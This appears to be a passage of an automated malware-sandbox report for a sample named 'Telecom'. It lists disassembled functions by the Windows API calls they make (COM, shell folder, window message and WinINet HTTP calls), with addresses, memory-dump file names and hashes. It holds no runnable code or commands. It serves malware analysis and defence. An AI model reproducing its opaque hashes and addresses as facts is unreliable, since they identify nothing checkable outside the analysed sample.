                                                      • Instruction ID: 1fe3bf9aea1e375433ec501536efbb607445d44c77d9e941b00bf3c056d18ddc
                                                      • Opcode Fuzzy Hash: 740fca3751b35bc7938b121b7bc34988e292e79e034c8d9140607233b8a30750
                                                      • Instruction Fuzzy Hash: 28318E31541215BBDF119FA5DC08FDB3BA9FF59324F110227FA18A62A0C739D860DB98
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 004C46B9
                                                      • CoInitialize.OLE32(00000000), ref: 004C46E7
                                                      • CoUninitialize.OLE32 ref: 004C46F1
                                                      • _wcslen.LIBCMT ref: 004C478A
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 004C480E
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 004C4932
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 004C496B
                                                      • CoGetObject.OLE32(?,00000000,004E0B64,?), ref: 004C498A
                                                      • SetErrorMode.KERNEL32(00000000), ref: 004C499D
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004C4A21
                                                      • VariantClear.OLEAUT32(?), ref: 004C4A35
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                      • String ID:
                                                      • API String ID: 429561992-0
                                                      • Opcode ID: f7106ea030b862e56509037fead7eacfc71708e330f22ac6be4743abc4e54191
                                                      • Instruction ID: c6947ac22ae355e8a4e85ec892ccfe908873d156fc925cab8fbc3a14e955ba5b
                                                      • Opcode Fuzzy Hash: f7106ea030b862e56509037fead7eacfc71708e330f22ac6be4743abc4e54191
                                                      • Instruction Fuzzy Hash: 39C146B9604301AF9740DF69C990E2BB7E9FF89748F00491EF8899B210D734ED05CB66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 004B8538
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004B85D4
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 004B85E8
                                                      • CoCreateInstance.OLE32(004E0CD4,00000000,00000001,00507E8C,?), ref: 004B8634
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004B86B9
                                                      • CoTaskMemFree.OLE32(?,?), ref: 004B8711
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 004B879C
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004B87BF
                                                      • CoTaskMemFree.OLE32(00000000), ref: 004B87C6
                                                      • CoTaskMemFree.OLE32(00000000), ref: 004B881B
                                                      • CoUninitialize.OLE32 ref: 004B8821
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                      • String ID:
                                                      • API String ID: 2762341140-0
                                                      • Opcode ID: b958038bfda1250d534e5e4590e444c70e805b9eee4772e6b6aecd6804005212
                                                      • Instruction ID: beb970244083d4e3813f4465e93d167fb99eea952ce5f52b110823582d0d0c69
                                                      • Opcode Fuzzy Hash: b958038bfda1250d534e5e4590e444c70e805b9eee4772e6b6aecd6804005212
                                                      • Instruction Fuzzy Hash: 1BC10B75A00109AFDB14DFA5C884D9EBBF9FF48308B1484AAE419DB361DB34ED45CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 004A039F
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 004A03F8
                                                      • VariantInit.OLEAUT32(?), ref: 004A040A
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 004A042A
                                                      • VariantCopy.OLEAUT32(?,?), ref: 004A047D
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004A0491
                                                      • VariantClear.OLEAUT32(?), ref: 004A04A6
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 004A04B3
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004A04BC
                                                      • VariantClear.OLEAUT32(?), ref: 004A04CE
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004A04D9
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: 86bd01e868ea7fd7efc8a572ffea645b789773acd6e579b1db62d4485297ea9b
                                                      • Instruction ID: 89a8d8b831ae02acb326227cd75e387d19fc62582813ce0f360dc04d6bdb8787
                                                      • Opcode Fuzzy Hash: 86bd01e868ea7fd7efc8a572ffea645b789773acd6e579b1db62d4485297ea9b
                                                      • Instruction Fuzzy Hash: E9417F31E00219AFCF10DFA5D8489EE7BB9FF19344F00806AE905A7261CB78A945CFA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CoInitialize.OLE32 ref: 004C41D1
                                                      • CoUninitialize.OLE32 ref: 004C41DC
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,004E0B44,?), ref: 004C4236
                                                      • IIDFromString.OLE32(?,?), ref: 004C42A9
                                                      • VariantInit.OLEAUT32(?), ref: 004C4341
                                                      • VariantClear.OLEAUT32(?), ref: 004C4393
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 636576611-1287834457
                                                      • Opcode ID: ac7a24601efa45391933ae40857c61dc7867d526a987ceb5e2df84ff165c7bc5
                                                      • Instruction ID: 5e9da3d56043fe27c1d5e598002d5fdfffdd9bbee3d145e65ac87c5f811c20fc
                                                      • Opcode Fuzzy Hash: ac7a24601efa45391933ae40857c61dc7867d526a987ceb5e2df84ff165c7bc5
                                                      • Instruction Fuzzy Hash: 3A61CF74604301AFD310DF65C999F6EBBE4AF89754F00045EF8819B2A1C778ED48CB9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 004B8C9C
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 004B8CAC
                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004B8CB8
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004B8D55
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004B8D69
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004B8D9B
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 004B8DD1
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004B8DDA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                      • String ID: *.*
                                                      • API String ID: 1464919966-438819550
                                                      • Opcode ID: 792d5716c4d8604f509b4b1895ae95dc0a50b6008715f5f736cbf86893915245
                                                      • Instruction ID: 583c63c99e554689543f45aad0c47118b85d1952096d857459cdf1ab24569bc4
                                                      • Opcode Fuzzy Hash: 792d5716c4d8604f509b4b1895ae95dc0a50b6008715f5f736cbf86893915245
                                                      • Instruction Fuzzy Hash: CD6159B2504305AFDB10EF61C84499EB7ECFF99314F04482FE98987251DB39E945CBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateMenu.USER32 ref: 004D4715
                                                      • SetMenu.USER32(?,00000000), ref: 004D4724
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004D47AC
                                                      • IsMenu.USER32(?), ref: 004D47C0
                                                      • CreatePopupMenu.USER32 ref: 004D47CA
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004D47F7
                                                      • DrawMenuBar.USER32 ref: 004D47FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                      • String ID: 0$F
                                                      • API String ID: 161812096-3044882817
                                                      • Opcode ID: bec4fcf6442e512603c5f790ee5b4abb228535084f9fa1e53fdb9259f2dcb3fd
                                                      • Instruction ID: c4afe98316349eaf755bbadbce89b6e4a4ef09394df3e77e08185437243be9ba
                                                      • Opcode Fuzzy Hash: bec4fcf6442e512603c5f790ee5b4abb228535084f9fa1e53fdb9259f2dcb3fd
                                                      • Instruction Fuzzy Hash: 7B41BA78A02209EFDB14DF64E894EAA7BB5FF49304F04402EFA0597350C774A914DF68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                        • Part of subcall function 004A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004A4620
                                                      • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 004A28B1
                                                      • GetDlgCtrlID.USER32 ref: 004A28BC
                                                      • GetParent.USER32 ref: 004A28D8
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 004A28DB
                                                      • GetDlgCtrlID.USER32(?), ref: 004A28E4
                                                      • GetParent.USER32(?), ref: 004A28F8
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 004A28FB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 711023334-1403004172
                                                      • Opcode ID: 7d529e93f15c04050715ed099e8e141237d80e60680f14cc4eb21955ebe336a2
                                                      • Instruction ID: cc27d40a1b0a167a22d743a027e81d0f22a8235c11fc58df714ed82956e51967
                                                      • Opcode Fuzzy Hash: 7d529e93f15c04050715ed099e8e141237d80e60680f14cc4eb21955ebe336a2
                                                      • Instruction Fuzzy Hash: 9621B3B4D00118BBDF04AFA5CC85DEEBBB8EF16314F00016BB951972D1DB798819DBA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                        • Part of subcall function 004A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004A4620
                                                      • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 004A2990
                                                      • GetDlgCtrlID.USER32 ref: 004A299B
                                                      • GetParent.USER32 ref: 004A29B7
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 004A29BA
                                                      • GetDlgCtrlID.USER32(?), ref: 004A29C3
                                                      • GetParent.USER32(?), ref: 004A29D7
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 004A29DA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 711023334-1403004172
                                                      • Opcode ID: 1a09967534182818491ebe948e7f7d15c134c1e58881522682d068188fc6c55e
                                                      • Instruction ID: 9576238abe2a9bbb8db8ab4895e8ffb2b0c14119093af336b6aeeb2dccbef053
                                                      • Opcode Fuzzy Hash: 1a09967534182818491ebe948e7f7d15c134c1e58881522682d068188fc6c55e
                                                      • Instruction Fuzzy Hash: 2421C2B5E00214BBDF00ABA5CC45EEFBBB8EF15304F004067B95197291C7798809DBA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004D4539
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004D453C
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004D4563
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004D4586
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004D45FE
                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 004D4648
                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004D4663
                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 004D467E
                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 004D4692
                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 004D46AF
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow
                                                      • String ID:
                                                      • API String ID: 312131281-0
                                                      • Opcode ID: 34c432fed67f490aa85a8c959b1cd6f510482cae04f8e56f4bff708907488f9f
                                                      • Instruction ID: 79b4b0af2db39f08643b8ef908070516b1caa73aea32372e91eb9026b32a92ce
                                                      • Opcode Fuzzy Hash: 34c432fed67f490aa85a8c959b1cd6f510482cae04f8e56f4bff708907488f9f
                                                      • Instruction Fuzzy Hash: 19619971A00208AFDB10DFA8CC91EEE77B8EF49704F10415AFA05A73A1C778A956DB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00442AF9
                                                      • OleUninitialize.OLE32(?,00000000), ref: 00442B98
                                                      • UnregisterHotKey.USER32(?), ref: 00442D7D
                                                      • DestroyWindow.USER32(?), ref: 00483A1B
                                                      • FreeLibrary.KERNEL32(?), ref: 00483A80
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00483AAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: 81501c04ebff044282650fed2073d0a49fdd1fefcac24e57c7ca3e6e71378c65
                                                      • Instruction ID: 92cd9aab4b6a77dcf09eddf020f40c62990637867610744b4e0fee10a58c0f9d
                                                      • Opcode Fuzzy Hash: 81501c04ebff044282650fed2073d0a49fdd1fefcac24e57c7ca3e6e71378c65
                                                      • Instruction Fuzzy Hash: 77D19D707012129FDB18EF15C995A6AF7A0FF04B05F5046AFE44A6B252CB79AD13CF48
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004B89F2
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004B8A06
                                                      • GetFileAttributesW.KERNEL32(?), ref: 004B8A30
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 004B8A4A
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004B8A5C
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 004B8AA5
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 004B8AF5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$AttributesFile
                                                      • String ID: *.*
                                                      • API String ID: 769691225-438819550
                                                      • Opcode ID: 0a60d5fa2514d03426412df0ad8ce98ea034b9697f13e3d4956206d65e96467f
                                                      • Instruction ID: 495b9506391acb29d6beb96c89dce719bee9fb58d92e30f7b796b0f2b0b94fb1
                                                      • Opcode Fuzzy Hash: 0a60d5fa2514d03426412df0ad8ce98ea034b9697f13e3d4956206d65e96467f
                                                      • Instruction Fuzzy Hash: 3E818EB19042059BDB24EE15C444ABBB3ECBF98310F58482FF885D7250EB38D945CBAB
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 004D8992
                                                      • IsWindowEnabled.USER32(00000000), ref: 004D899E
                                                      • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 004D8A79
                                                      • SendMessageW.USER32(00000000,000000B0,?,?), ref: 004D8AAC
                                                      • IsDlgButtonChecked.USER32(?,00000000), ref: 004D8AE4
                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 004D8B06
                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 004D8B1E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                      • String ID: (Q
                                                      • API String ID: 4072528602-2768264020
                                                      • Opcode ID: 150c528682cef3398d961c6f50dce7ced22f306244bb57d36ca604a58e26430c
                                                      • Instruction ID: 1d6d1be874401a17b5b6b8877fc4e1cdd1ce4940f6d8d9143ce16f5afac6886b
                                                      • Opcode Fuzzy Hash: 150c528682cef3398d961c6f50dce7ced22f306244bb57d36ca604a58e26430c
                                                      • Instruction Fuzzy Hash: 5171CEB4604204AFEB209F54C8A4FBB7BB9EF09300F14049FE98567361CB39A981DB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 004474D7
                                                        • Part of subcall function 00447567: GetClientRect.USER32(?,?), ref: 0044758D
                                                        • Part of subcall function 00447567: GetWindowRect.USER32(?,?), ref: 004475CE
                                                        • Part of subcall function 00447567: ScreenToClient.USER32(?,?), ref: 004475F6
                                                      • GetDC.USER32 ref: 00486083
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00486096
                                                      • SelectObject.GDI32(00000000,00000000), ref: 004860A4
                                                      • SelectObject.GDI32(00000000,00000000), ref: 004860B9
                                                      • ReleaseDC.USER32(?,00000000), ref: 004860C1
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00486152
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      • Opcode ID: 150e0b3b50ec989c8f2771abcd9543e7ea51c64363c777f5ad9a4824f49a4c3f
                                                      • Instruction ID: 3c25e05793576962a17181244b29c9b8f884eba28ba48cc1fabdc2c94aa6c439
                                                      • Opcode Fuzzy Hash: 150e0b3b50ec989c8f2771abcd9543e7ea51c64363c777f5ad9a4824f49a4c3f
                                                      • Instruction Fuzzy Hash: 1771FF30500205EFCF21EF64C888ABE3BB1FF45314F158A6BED555A2A7C7388881EB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004BCCB7
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004BCCDF
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004BCD0F
                                                      • GetLastError.KERNEL32 ref: 004BCD67
                                                      • SetEvent.KERNEL32(?), ref: 004BCD7B
                                                      • InternetCloseHandle.WININET(00000000), ref: 004BCD86
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
